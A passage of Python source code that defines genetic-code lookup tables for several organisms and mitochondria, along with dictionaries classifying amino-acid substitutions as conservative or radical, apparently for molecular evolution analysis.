'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt cod
aaSchemeDict1 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict2 = {("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict3 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R